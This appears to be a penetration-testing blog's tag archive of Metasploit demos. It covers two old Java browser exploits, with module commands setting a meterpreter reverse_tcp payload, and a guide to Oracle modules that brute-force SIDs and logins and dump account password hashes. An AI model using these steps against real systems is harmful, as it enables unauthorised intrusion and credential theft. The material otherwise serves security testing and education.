Tag Archives: Oracle

CVE-2010-0842 Java MixerSequencer Vulnerability Metasploit Demo

Timeline :

Vulnerability reported to ZDI by Peter Vreugdenhil
Vulnerability reported to the vendor by ZDI the 2009-12-10
Coordinated public release of the vulnerability the 2010-04-05
Details of the vulnerability and first PoC disclosed the 2010-05-21
Metasploit PoC provided the 2012-02-15

PoC provided by :

Peter Vreugdenhil
juan vazquez

Reference(s) :


Affected version(s) :

Java 6 before or equal to update 18

Tested on Windows 7 Integral with :

Java 6 Update 18
Internet Explorer 9

Description :

This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation id done by supplying a specially crafted MIDI file within an RMF File. When the MixerSequencer objects is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A Midi block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When triggering the vulnerability “ebx” points to a fake event in the MIDI file which stores the shellcode. A “jmp ebx” from msvcr71.dll is used to make the exploit reliable over java updates.

Commands :

use exploit/windows/browser/java_mixer_sequencer
SET PAYLOAD windows/meterpreter/reverse_tcp


CVE-2011-3544 Java Applet Rhino Script Engine Metasploit Demo

Timeline :

Vulnerability discovered and reported to ZDI by Michael Schierl
Vulnerability reported to vendor by ZDI the 2011-05-12
Coordinated release of the vulnerability the 2011-10-26
First exploit provided by Michael Schierl
Metasploit PoC provided the 2011-11-29

PoC provided by :

Michael Schierl
juan vazquez
Edward D. Teach

Reference(s) :

Oracle Java SE CPU October 2011

Affected version(s) :

JDK and JRE 7, 6 Update 27 and before

Tested on Windows XP Pro SP3 with :

Java JSE 6 Update 26

Description :

This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc)

Commands :

use exploit/multi/browser/java_rhino
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp


Metasploit Oracle database enumeration (oraenum)

Metasploit provide one useful and additional Oracle database auxiliary module who will permit you to gather informations.

You can find all these auxiliary modules through the Metasploit search command.

To invoke this auxiliary module just type the following command :

This module will scan the Oracle database server to gather different informations :

  • Oracle version (select * from v$version)
  • All values from v$parameter (select name,value from v$parameter)
  • If database audit trail is enabled or not
  • If database sys operations audit is enabled or not
  • If SQL92 security restriction on SELECT is enabled or not
  • If link encryption for logins is enabled or not
  • Provide you the UTL directory access configuration
  • Provide you the audit log directory configuration
  • Provide you the current account lockout time from the password policy
  • Provide you the number of authorized failed logins value before an account is locked from the password policy
  • Provide you the password grace time value from the password policy
  • Provide you the password lifetime value from the password policy
  • Provide you the the number of times a password can be reused from the password policy
  • Provide you the maximun number of times a password needs to be changed before it can be reused from the password policy
  • Check if the password complexity is enabled or not
  • Provide you a list of all active accounts in format Username, Hash and Spare4
  • Provide you a list of all expired or locked accounts in format Username, Hash and Spare4
  • Provide you a list of all accounts with DBA privileges in format Username and Hash
  • Provide you a list of all accounts with ALTER, JAVA ADMIN, CREATE LIBRARY, CREATE ANY.
  • Check default password are setup on the database.

Metasploit Oracle Database Auxiliary Modules

Metasploit provide some Oracle database auxiliary modules who will permit you to brute force SID’s, do brute force login and execute SQL queries.

You can find all these auxiliary modules through the Metasploit search command.

Oracle TNS Listener SID enumeration scanner (sid_enum)

To invoke this auxiliary module just type the following command :

This module attempt to discover running Oracle TNS Listener and the associated SID. For Oracle database above the listener is protected and the SID will have to be brute forced. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range (ex :, or or a file (file:/tmp/ip_addresses.txt). Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

Oracle TNS Listener version scanner (tnslsnr_version)

To invoke this auxiliary module just type the following command :

This module attempt to discover running Oracle TNS Listener and they’re versions. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range or a file. Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

Oracle TNS Listener information gathering (tnscmd)

To invoke this auxiliary module just type the following command :

This module will send TNS commands in order to gather informations. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range or a file. Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

Oracle TNS Listener SID brute force – admin module (sid_brute)

To invoke this auxiliary module just type the following command :

This module attempt to discover running Oracle database SID’s. Just provide the target address range to the “RHOST” variable. “RHOST” variable should be an unique IP address. You can specify the amount of seconds between each request by the “SLEEP” variable. Metasploit provide a common SID list file located in “/opt/metasploit3/msf3/data/wordlists/sid.txt“.

Oracle TNS Listener SID brute force – scanner module (sid_brute)

To invoke this auxiliary module just type the following command :

This module provide you the same as result as the “sid_brute” admin module, but you have more module definition options and outputs. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range or a file. Metasploit provide a common SID list file located in “/opt/metasploit3/msf3/data/wordlists/sid.txt“. Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

Oracle authentication brute force login – admin module (oracle_login)

To invoke this auxiliary module just type the following command :

This module attempts to authenticate against an Oracle database using username and password combinations indicated by the “CSVFILE“. Metasploit provide a common login and password file in “/opt/metasploit3/msf3/data/wordlists/oracle_default_passwords.csv“. Provide the target address range to the “RHOST” variable. “RHOST” variable should be a an unique IP address.

Oracle authentication brute force login – scanner module (oracle_login)

To invoke this auxiliary module just type the following command :

First of all this module require that you have Nmap >= 5.50 installed on your Metasploit station. This module provide you the same as result as the “oracle_login” admin module, but you have more module definition options and outputs. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range or a file. This module is also attempting to authenticate against the Oracle instance using username and password combinations indicated by the “USER_FILE“, “PASS_FILE“, and “USERPASS_FILE” options. Metasploit provide a default “USERPASS_FILE“ located in “/opt/metasploit3/msf3/data/wordlists/oracle_default_userpass.txt” . You can use SkullSecurity password lists, or my own list how is updated regularly. Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.  Take care to don’t forget to configure the “RPORTS” variable to “1521” for example.

All valid user and password combinations are in green, but you will also see valid accounts how are locked.

Oracle generic SQL query execution (oracle_sql)

To invoke this auxiliary module just type the following command :

This module attempts to execute an SQL query against the Oracle instance. The default SQL query will check the running version of Oracle database. You will require valid SID, login and password previously discovered with the “sid_brute” and “oracle_login” auxiliary modules. Provide the target serveur to the “RHOST” variable. “RHOST” variable should be an unique IP address.

Some useful SQL Oracle queries for pen testing are available on pentestmonkey website.